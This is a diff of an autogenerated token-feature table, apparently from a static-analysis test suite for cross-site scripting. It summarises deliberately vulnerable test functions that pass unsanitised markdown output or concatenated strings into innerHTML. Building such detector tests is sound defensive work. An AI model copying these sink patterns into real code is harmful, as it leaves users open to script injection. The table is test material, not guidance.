constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html = ... nder(s) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html = ... nder(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html = ... nder(s) | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html = ... nder(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:25 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:25 | markdown | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:25 | markdown | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:25 | markdown | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:25 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:32 | markdown.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:32 | markdown.render | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:32 | markdown.render | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:32 | markdown.render | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:32 | markdown.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | exceptional return of markdown.render(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | exceptional return of markdown.render(s) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | exceptional return of markdown.render(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | exceptional return of markdown.render(s) | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | exceptional return of markdown.render(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | markdown.render(s) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | markdown.render(s) | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | markdown.render(s) | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | markdown.render(s) | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:18:117:35 | markdown.render(s) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:27:117:32 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:27:117:32 | render | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:27:117:32 | render | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:27:117:32 | render | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:27:117:32 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | CalleeFlexibleAccessPath | markdown.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | calleeImports | markdown-it | @@ -23590,6 +154206,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:34:117:34 | s | receiverName | markdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:12 | document | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:12 | document | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:26 | documen ... elector | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:26 | documen ... elector | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | documen ... kdown") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | documen ... kdown") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | documen ... kdown") | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | documen ... kdown") | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | documen ... kdown") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | exceptional return of documen ... kdown") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | exceptional return of documen ... kdown") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | exceptional return of documen ... kdown") | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | exceptional return of documen ... kdown") | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:39 | exceptional return of documen ... kdown") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:49 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:49 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:49 | documen ... nerHTML | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:49 | documen ... nerHTML | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:49 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:56 | documen ... = html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:56 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:56 | documen ... = html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:56 | documen ... = html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:5:118:56 | documen ... = html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:14:118:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:14:118:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:14:118:26 | querySelector | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:14:118:26 | querySelector | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:14:118:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23598,18 +154249,85 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:28:118:38 | "#markdown" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:41:118:49 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:41:118:49 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:41:118:49 | innerHTML | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:41:118:49 | innerHTML | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:41:118:49 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | enclosingFunctionName | xssThroughMarkdown | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:118:53:118:56 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:0 | this | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:1 | id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:1 | id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:1:1:1 | id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:1:7 | this | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:1:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:1:7 | this | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:1:7 | this | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:1:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | 'arguments' object of function basicHtmlConstruction | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | 'arguments' object of function basicHtmlConstruction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | 'arguments' object of function basicHtmlConstruction | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | 'arguments' object of function basicHtmlConstruction | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | 'arguments' object of function basicHtmlConstruction | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | exceptional return of function basicHtmlConstruction | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | exceptional return of function basicHtmlConstruction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | exceptional return of function basicHtmlConstruction | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | exceptional return of function basicHtmlConstruction | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | exceptional return of function basicHtmlConstruction | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | functio ... html;\\n} | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | functio ... html;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | return of function basicHtmlConstruction | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | return of function basicHtmlConstruction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | return of function basicHtmlConstruction | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | return of function basicHtmlConstruction | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:8:4:1 | return of function basicHtmlConstruction | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:17:1:37 | basicHt ... ruction | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:17:1:37 | basicHt ... ruction | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:17:1:37 | basicHt ... ruction | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:1:39:1:39 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:14 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:14 | html | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:14 | html | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:14 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html = ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html = ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:11:2:41 | html = ... /span>" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | enclosingFunctionBody | s html s document body innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | enclosingFunctionName | basicHtmlConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:29 | "" + s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:29 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:29 | "" + s | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:29 | "" + s | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:29 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:41 | " ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:41 | " ... /span>" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:18:2:41 | " ... /span>" | enclosingFunctionBody | s html s document body innerHTML html | @@ -23627,12 +154345,128 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:33:2:41 | "" | enclosingFunctionName | basicHtmlConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:33:2:41 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:2:33:2:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:12 | document | 